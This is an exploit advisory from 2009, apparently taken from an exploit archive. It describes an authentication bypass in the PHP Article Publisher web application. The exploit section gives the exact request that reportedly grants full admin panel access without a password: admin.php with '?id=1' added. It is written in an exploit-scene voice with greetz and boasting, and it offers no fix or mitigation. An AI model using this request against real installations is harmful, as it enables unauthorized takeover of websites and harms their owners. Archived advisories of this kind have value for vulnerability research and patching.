PHP Article Publisher - Arbitrary Authentication Bypass

EKU-ID: 16555	CVE:	OSVDB-ID:
Author: ThE g0bL!N	Published: 2009-05-20	Verified:
Download:

Rating

☆☆☆☆☆

--------------------------------------------------------------
PHP Article Publisher Arbitrary Auth Bypass Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
download from:http://www.graugon.com/publisher/download.html
Thank You Very Much ahmadbady
Note: Jmaa asmehouna ala ihdae pcq thaghra meshi meliha :)
---------------------------------------------------------------
Exploit:
------
path of control panel is
http://localhost/php_article_publisher/publisher/admin.php
The panel Wanted Pass and user.
exploit is :
------------
http://localhost/php_article_publisher/publisher/admin.php?id=1
Boooom !!Control panel Bypassed
Then Return in Home page admin.php
Note:You have all permission :)
----
Note2: Tested On localhost
-----
----------------------------------------------------------------
Greetz : His0k4 &AhmadBady & Cyb3r-Dev!L
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]